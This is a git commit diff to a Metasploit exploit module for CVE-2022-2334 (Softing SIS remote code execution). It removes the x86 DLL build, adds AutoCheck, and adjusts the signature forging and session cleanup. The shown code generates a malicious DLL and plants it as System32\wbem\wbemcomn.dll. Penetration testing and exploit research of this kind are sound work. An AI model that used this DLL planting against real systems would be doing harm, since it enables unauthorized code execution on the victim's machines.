Remove x86 things, include AutoCheck

ide0x90 · ide0x90 · commit afd4b8af2ea9 · 2024-04-19T22:49:40.000+08:00
diff --git a/data/exploits/CVE-2022-2334/template_x86_windows.dll b/data/exploits/CVE-2022-2334/template_x86_windows.dll
diff --git a/external/source/exploits/CVE-2022-2334/build.sh b/external/source/exploits/CVE-2022-2334/build.sh
@@ -1,13 +1,7 @@
 #!/bin/sh
-CCx86="i686-w64-mingw32"
 CCx64="x86_64-w64-mingw32"
 
 ${CCx64}-gcc -shared -o temp.dll template.def template.c
 ${CCx64}-strip -s temp.dll -o ../../../../data/exploits/CVE-2022-2334/template_x64_windows.dll
 rm -f temp.dll *.o
 chmod -x ../../../../data/exploits/CVE-2022-2334/template_x64_windows.dll
-
-${CCx86}-gcc -shared -o temp.dll template.def template.c
-${CCx86}-strip -s temp.dll -o ../../../../data/exploits/CVE-2022-2334/template_x86_windows.dll
-rm -f temp.dll *.o
-chmod -x ../../../../data/exploits/CVE-2022-2334/template_x86_windows.dll
diff --git a/modules/exploits/windows/http/softing_sis_rce.rb b/modules/exploits/windows/http/softing_sis_rce.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -152,7 +153,7 @@ def check
       # get the authentication token
       auth_token = checker_instance.get_auth_token(datastore['USERNAME'])
       # generate the signature
-      @signature = checker_instance.generate_signature(auth_token, datastore['USERNAME'], datastore['PASSWORD'])
+      @signature = checker_instance.generate_signature(auth_token[:proof], datastore['USERNAME'], datastore['PASSWORD'])
       # check the generated signatures' validity
       signature_check_res = signature_check(datastore['USERNAME'], @signature)
       # if we cannot connect, then the system "appears" to be vulnerable
@@ -175,11 +176,6 @@ def check
   end
 
   def exploit
-    # in this case, if it appears vulnerable, it should be enough to continue the exploit
-    unless [CheckCode::Appears].include? check
-      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
-    end
-
     # did the operator specify a custom DLL? If not...
     if datastore['DLLPATH']
       # otherwise, just use their provided DLL and assume they compiled everything correctly
@@ -188,9 +184,8 @@ def exploit
     else
       # have MSF create the malicious DLL
       path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')
-      arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
       datastore['EXE::Path'] = path
-      datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
+      datastore['EXE::Template'] = ::File.join(path, "template_x64_windows.dll")
 
       print_status('Generating payload DLL...')
       dll = generate_payload_dll
@@ -270,6 +265,8 @@ def exploit
 
   # clean up the planted DLL if the session is meterpreter
   def on_new_session(session)
+    super
+
     if session.type != 'meterpreter'
       print_error('Meterpreter not used. Please manually remove C:\\Windows\\System32\\wbem\\wbemcomn.dll')
       return
